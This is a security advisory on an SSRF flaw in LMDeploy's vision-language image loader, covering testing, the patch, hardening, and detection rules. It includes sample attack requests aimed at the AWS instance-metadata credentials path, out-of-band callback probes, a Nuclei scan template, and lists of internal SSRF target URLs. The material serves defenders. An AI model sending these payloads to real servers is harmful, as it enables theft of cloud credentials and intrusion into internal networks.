Executive Summary
A Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language image loader — tracked as CVE-2026-33626 — allows unauthenticated or low-privilege attackers to weaponize an AI model server's network identity, reaching internal services, cloud metadata endpoints, and IAM credential stores. First published in April 2026, the flaw was actively exploited in the wild within 13 hours of public disclosure, making this one of the fastest exploited AI infrastructure vulnerabilities on record. Organizations running LMDeploy for LLM inference — especially on cloud GPU instances — should patch to version 0.12.3 immediately.
1. What Is This Vulnerability?
LMDeploy is an open-source Python toolkit by InternLM for compressing, deploying, and serving large language models (LLMs). Its vision-language (VL) pipeline includes a helper function, load_image(), located in lmdeploy/vl/utils.py, that downloads images from URLs passed as part of a multimodal prompt.
The flaw: load_image() fetches arbitrary URLs with no validation of the destination IP address. No allowlist, no blocklist, no check for RFC1918 private ranges or link-local addresses. Whatever URL an attacker supplies, the model server will fetch it — and the response gets silently returned to the caller.
How the Vulnerable Code Looks
# VULNERABLE — lmdeploy/vl/utils.py (pre-0.12.3)
import requests
from PIL import Image
from io import BytesIO
def load_image(url: str) -> Image.Image:
response = requests.get(url, timeout=10) # No URL validation
return Image.open(BytesIO(response.content))
An attacker providing a multimodal API request such as:
{
"messages": [{
"role": "user",
"content": [
{"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}},
{"type": "text", "text": "Describe this image."}
]
}]
}
…receives the AWS Instance Metadata Service (IMDS) response embedded in the model's error output or streaming response — handing over temporary IAM credentials without any authentication bypass required.
Attack Vector
The attack surface is the model's public or internal API endpoint — any port exposing the LMDeploy OpenAI-compatible /v1/chat/completions route. The attacker:
- Sends a multimodal chat completion request with a crafted
image_urlpointing to an internal resource. - The GPU server fetches the URL on the attacker's behalf.
- The HTTP response body is returned to the attacker (via error, streaming fragment, or image decode failure message).
- Targets include: AWS IMDS (
169.254.169.254), GCP metadata (169.254.169.254/computeMetadata/v1/), Azure IMDS, internal Redis/MySQL hosts, secondary admin interfaces, and OOB DNS exfiltration endpoints.
Real-World Impact
Sysdig's threat research team detected active exploitation of their honeypot within 12 hours and 31 minutes of CVE disclosure. The attacker was observed:
- Port-scanning the internal network behind the model server
- Querying the AWS IMDS to harvest IAM role credentials
- Reaching Redis and MySQL internal database ports
- Using an out-of-band DNS endpoint for blind data exfiltration
Because GPU inference nodes typically run with broad IAM roles (for model artifact S3 access, logging, etc.), a single successful IMDS fetch can pivot into full cloud account compromise.
2. Who Is Affected?
| Component | Affected Versions |
|---|---|
lmdeploy (PyPI) |
All versions < 0.12.3 |
| InternLM LMDeploy GitHub | All commits prior to the 0.12.3 release tag |
| Dockerized deployments | Any container image built from pre-0.12.3 source |
| Cloud GPU instances (AWS/GCP/Azure) | Highest risk — IMDS accessible by default |
| On-prem bare-metal deployments | Elevated risk if internal services are reachable |
You are NOT affected if:
- You are running LMDeploy ≥ 0.12.3
- You serve only text (non-VL) models with no vision pipeline loaded
- Your deployment is fully air-gapped with no outbound HTTP from the inference node
3. How to Detect It (Testing)
Manual Testing Steps
-
Identify the endpoint. Confirm the LMDeploy server is running and accepting multimodal requests:
curl http://<host>:<port>/v1/modelsLook for a vision-capable model in the list (e.g.,
internlm-xcomposer,llava, etc.). -
Set up a listener. Use a service like Burp Collaborator or
interactshto capture out-of-band requests:interactsh-client -v # records DNS/HTTP callbacks -
Send the SSRF probe. Submit a multimodal request with the OOB URL:
curl -X POST http://<host>:<port>/v1/chat/completions \ -H "Content-Type: application/json" \ -d '{ "model": "<vision-model-name>", "messages": [{ "role": "user", "content": [ {"type": "image_url", "image_url": {"url": "http://<your-interactsh-host>/ssrf-probe"}}, {"type": "text", "text": "What is in this image?"} ] }] }' -
Check for internal metadata access. On cloud instances, target the IMDS:
# Replace image_url with: "http://169.254.169.254/latest/meta-data/"If the server response contains metadata text (AMI ID, IAM role name, etc.) in any part of the response body or error message, the server is vulnerable.
-
A positive result looks like: an HTTP callback recorded at your OOB listener, or metadata content reflected in the API error response.
Automated Scanning
-
Tool: Nuclei with a custom template
-
Template Concept:
id: CVE-2026-33626-lmdeploy-ssrf info: name: LMDeploy Vision-Language SSRF severity: high requests: - method: POST path: - "{{BaseURL}}/v1/chat/completions" body: | {"model":"{{model}}","messages":[{"role":"user","content":[ {"type":"image_url","image_url":{"url":"{{interactsh-url}}"}}, {"type":"text","text":"describe"}]}]} matchers: - type: word part: interactsh_protocol words: - "http" -
Expected output: Interaction detected at the OOB callback host.
-
Tool: Snyk — scan the Python environment:
snyk test --package-manager=pip # Look for: lmdeploy @ <0.12.3 — SSRF (CVE-2026-33626)
Code Review Checklist
- Search codebase for
requests.get(url)orurllib.request.urlopen(url)called with user-supplied input - Verify
load_image()or equivalent URL-fetching helpers validate destination IPs against a blocklist - Confirm RFC1918 ranges (10.x, 172.16-31.x, 192.168.x), link-local (169.254.x.x), and loopback (127.x) are blocked
- Check that cloud metadata IP
169.254.169.254is explicitly denied - Ensure no partial URL content is reflected back in error messages (information disclosure)
4. How to Fix It (Mitigation)
Step-by-Step Remediation
-
Upgrade LMDeploy immediately.
pip install --upgrade "lmdeploy>=0.12.3"Verify:
python -c "import lmdeploy; print(lmdeploy.__version__)" # Expected: 0.12.3 or higher -
Rebuild Docker images if you maintain containerized deployments:
# Update your requirements.txt or Dockerfile RUN pip install "lmdeploy>=0.12.3"Then rebuild and redeploy all running containers.
-
Rotate any credentials exposed during the window. If your server was running a vulnerable version and was internet-accessible, assume IMDS credentials were harvested. Rotate IAM roles, API keys, and service account tokens immediately.
-
Enable IMDSv2 on AWS EC2 instances to require token-based metadata requests (thwarts SSRF-based IMDS access even if SSRF exists):
aws ec2 modify-instance-metadata-options \ --instance-id <your-instance-id> \ --http-tokens required \ --http-endpoint enabled -
Restrict outbound network egress from inference nodes using security groups, NACLs, or iptables rules so they can only reach necessary destinations (model storage, logging sinks).
Code Fix Example
The patched load_image() in 0.12.3 implements IP validation before fetching:
# PATCHED — lmdeploy/vl/utils.py (>= 0.12.3)
import ipaddress
import socket
import requests
from urllib.parse import urlparse
from PIL import Image
from io import BytesIO
BLOCKED_NETWORKS = [
ipaddress.ip_network("10.0.0.0/8"),
ipaddress.ip_network("172.16.0.0/12"),
ipaddress.ip_network("192.168.0.0/16"),
ipaddress.ip_network("169.254.0.0/16"), # link-local / cloud IMDS
ipaddress.ip_network("127.0.0.0/8"), # loopback
ipaddress.ip_network("::1/128"),
ipaddress.ip_network("fc00::/7"),
]
def _is_safe_url(url: str) -> bool:
parsed = urlparse(url)
if parsed.scheme not in ("http", "https"):
return False
try:
ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
except (socket.gaierror, ValueError):
return False
return not any(ip in net for net in BLOCKED_NETWORKS)
def load_image(url: str) -> Image.Image:
if not _is_safe_url(url):
raise ValueError(f"Blocked URL (SSRF protection): {url}")
response = requests.get(url, timeout=10)
return Image.open(BytesIO(response.content))
Configuration Hardening
Beyond patching, harden the host environment:
# Block cloud metadata endpoint at iptables level (defense-in-depth)
iptables -A OUTPUT -d 169.254.169.254 -j DROP
ip6tables -A OUTPUT -d fe80::/10 -j DROP
# Restrict outbound to required destinations only
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -d <model-storage-cidr> -j ACCEPT
iptables -A OUTPUT -j DROP
5. How to Test the Fix (Validation)
Regression Test Scenarios
- Scenario A: Upgraded to 0.12.3, send the SSRF probe from Step 3 — confirm no OOB callback is received and the API returns a
ValueError/400 response. - Scenario B: Send a legitimate multimodal request with a valid public image URL — confirm the model processes it normally (no regression in functionality).
- Scenario C: Attempt to fetch
http://127.0.0.1:<internal-port>/via the image URL — confirm it is blocked.
Security Test Cases
Test Case 1: SSRF probe no longer triggers
- Precondition: LMDeploy upgraded to ≥ 0.12.3
- Steps: Submit multimodal request with
image_url=http://169.254.169.254/latest/meta-data/ - Expected Result: API returns HTTP 400 or 500 with a blocked/invalid URL error; no metadata content in response; no OOB callback recorded
Test Case 2: Private IP ranges blocked
- Precondition: LMDeploy ≥ 0.12.3
- Steps: Submit
image_url=http://192.168.1.1/andhttp://10.0.0.1/ - Expected Result: Both requests rejected before any outbound connection
Test Case 3: Legitimate image URL still works
- Precondition: LMDeploy ≥ 0.12.3, test with a known public image
- Steps: Submit
image_url=https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_demonstration_1.png/280px-PNG_transparency_demonstration_1.png - Expected Result: Model responds normally to the multimodal prompt
Automated Tests
# pytest security regression test
import pytest
import requests
LMDEPLOY_BASE = "http://localhost:23333"
VISION_MODEL = "internlm-xcomposer"
SSRF_URLS = [
"http://169.254.169.254/latest/meta-data/",
"http://127.0.0.1/",
"http://10.0.0.1/",
"http://192.168.1.1/",
"http://172.16.0.1/",
]
@pytest.mark.parametrize("ssrf_url", SSRF_URLS)
def test_ssrf_blocked(ssrf_url):
resp = requests.post(f"{LMDEPLOY_BASE}/v1/chat/completions", json={
"model": VISION_MODEL,
"messages": [{
"role": "user",
"content": [
{"type": "image_url", "image_url": {"url": ssrf_url}},
{"type": "text", "text": "describe"}
]
}]
})
# Must not return 200 with content from internal resource
assert resp.status_code in (400, 422, 500), f"Expected error for SSRF URL: {ssrf_url}"
body = resp.text.lower()
assert "iam" not in body
assert "ami-id" not in body
assert "security-credentials" not in body
6. Prevention & Hardening
Best Practices
- Validate all user-supplied URLs before making outbound HTTP requests in any server-side component. Never trust user input to determine fetch destinations.
- Apply defense-in-depth at the network layer. Even if application-level URL validation fails, a firewall rule blocking access to
169.254.169.254and RFC1918 ranges provides a critical safety net. - Pin AI/ML framework versions in your
requirements.txtorpyproject.tomland automate dependency vulnerability scanning with Snyk, Dependabot, or OSV-Scanner in CI/CD. - Enforce IMDSv2 everywhere. Token-required IMDSv2 requires a PUT pre-flight that SSRF primitives cannot execute, effectively neutering IMDS-targeting SSRF on AWS.
- Limit IAM permissions for inference nodes using least-privilege roles — they should not have
iam:*ors3:*on all buckets.
Monitoring & Detection
Set up the following alerts to catch exploitation attempts in real time:
# 1. Alert on outbound connections to 169.254.169.254 from inference hosts
# (CloudWatch / VPC Flow Logs query)
filter (destinationAddress = "169.254.169.254") and sourceAddress like /10\./
# 2. SIEM rule: HTTP request to internal RFC1918 from GPU node process
# (Falco rule for container workloads)
- rule: LMDeploy SSRF Attempt
desc: Outbound connection to private/IMDS IP from lmdeploy process
condition: >
outbound and proc.name="python" and
(fd.rip startswith "10." or
fd.rip startswith "172.16." or
fd.rip = "169.254.169.254")
output: "Possible SSRF: %proc.name connecting to %fd.rip"
priority: CRITICAL
# 3. Monitor Python process DNS resolution for IMDS hostnames
# (auditd rule)
-a always,exit -F arch=b64 -S connect -F exe=/usr/bin/python3 -k ssrf_connect
Log aggregation: Forward inference node access logs to your SIEM and alert on:
- Any request body containing the string
169.254.169.254 - Unusually short image download times followed by large response payloads (possible metadata reflection)
- Requests to internal hostnames/IPs from the model API endpoint
References
- CVE Entry: CVE-2026-33626 — NVD
- GitLab Advisory: CVE-2026-33626: LMDeploy SSRF via Vision-Language Image Loading
- Sysdig Analysis: CVE-2026-33626: How attackers exploited LMDeploy in 12 hours
- Hacker News Coverage: LMDeploy CVE-2026-33626 Flaw Exploited Within 13 Hours
- Vulert Write-up: LMDeploy CVE-2026-33626 — SSRF Flaw Exposes AI Infrastructure
- Tenable: CVE-2026-33626 Details
- Sentinel One DB: CVE-2026-33626: Internlm Lmdeploy SSRF
- Patch Release: LMDeploy v0.12.3 — PyPI